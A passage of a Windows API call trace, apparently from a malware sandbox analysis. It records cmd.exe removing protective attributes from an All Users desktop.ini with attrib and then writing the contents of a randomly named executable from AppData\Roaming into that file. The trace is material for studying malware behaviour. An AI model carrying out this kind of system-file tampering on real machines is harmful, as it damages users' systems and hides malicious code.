lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 
0x63 [0177.877] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.886] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.887] GetLastError () returned 0x2 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.887] GetLastError () returned 0x2 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0x282600 [0177.888] FindClose (in: hFindFile=0x282600 | out: hFindFile=0x282600) returned 1 [0177.888] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.888] GetLastError () returned 0x2 [0177.888] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0x282600 [0177.888] FindClose (in: hFindFile=0x282600 | out: hFindFile=0x282600) returned 1 [0177.888] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.888] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.888] GetConsoleTitleW (in: lpConsoleTitle=0x14f118, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.888] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x14efa0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f068 | out: lpAttributeList=0x14efa0, lpSize=0x14f068) returned 1 [0177.888] UpdateProcThreadAttribute (in: lpAttributeList=0x14efa0, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f060, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14efa0, lpPreviousValue=0x0) returned 1 [0177.888] GetStartupInfoW (in: lpStartupInfo=0x14ef5c | out: lpStartupInfo=0x14ef5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.888] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.889] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14effc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f048 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessInformation=0x14f048*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb7c, dwThreadId=0xc00)) returned 1 [0177.893] CloseHandle (hObject=0x4c) returned 1 [0177.893] SetEnvironmentVariableW (lpName="COPYCMD", 
lpValue=0x0) returned 1 [0177.894] GetEnvironmentStringsW () returned 0x280b18* [0177.894] FreeEnvironmentStringsW (penv=0x280b18) returned 1 [0177.894] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0177.934] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14ef3c | out: lpExitCode=0x14ef3c*=0x0) returned 1 [0177.934] CloseHandle (hObject=0x50) returned 1 [0177.934] _vsnwprintf (in: _Buffer=0x14f084, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ef48 | out: _Buffer="00000000") returned 8 [0177.934] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.934] GetEnvironmentStringsW () returned 0x282670* [0177.934] FreeEnvironmentStringsW (penv=0x282670) returned 1 [0177.934] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.934] GetEnvironmentStringsW () returned 0x282670* [0177.934] FreeEnvironmentStringsW (penv=0x282670) returned 1 [0177.934] DeleteProcThreadAttributeList (in: lpAttributeList=0x14efa0 | out: lpAttributeList=0x14efa0) [0177.934] GetConsoleTitleW (in: lpConsoleTitle=0x14f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.934] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14e398, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e39c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14e398*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0177.935] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0177.935] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0177.935] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini")) returned 
0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1")) returned 0x2010 [0177.935] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0177.935] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini")) returned 0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x28376c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28376c) returned 0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] _get_osfhandle (_FileHandle=2) returned 0xb [0177.935] GetFileType (hFile=0xb) returned 0x2 [0177.936] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0177.936] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14ed98 | out: lpMode=0x14ed98) returned 1 [0177.936] _get_osfhandle (_FileHandle=2) returned 0xb [0177.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14edcc | out: lpConsoleScreenBufferInfo=0x14edcc) returned 1 [0177.936] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] GetFileType (hFile=0x7) returned 0x2 [0177.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.937] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0177.937] _dup 
(_FileHandle=1) returned 3 [0177.937] _close (_FileHandle=1) returned 0 [0177.937] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini", _String2="con") returned -53 [0177.937] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f48c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0177.938] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0177.938] GetConsoleTitleW (in: lpConsoleTitle=0x14f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.938] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x14ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ee20) returned 0x281488 [0177.938] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0177.938] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0177.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0177.938] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14dd2c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0177.938] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] GetFileType (hFile=0x58) returned 0x1 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x14dd84 | out: 
lpFileSizeHigh=0x14dd84*=0x0) returned 0x7d600 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] GetFileType (hFile=0x50) returned 0x1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] GetFileType (hFile=0x50) returned 0x1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.940] GetFileType (hFile=0x50) returned 0x1 [0177.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.940] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile 
(in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.941] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 
0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.943] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, 
lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: 
lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.944] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.945] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] 
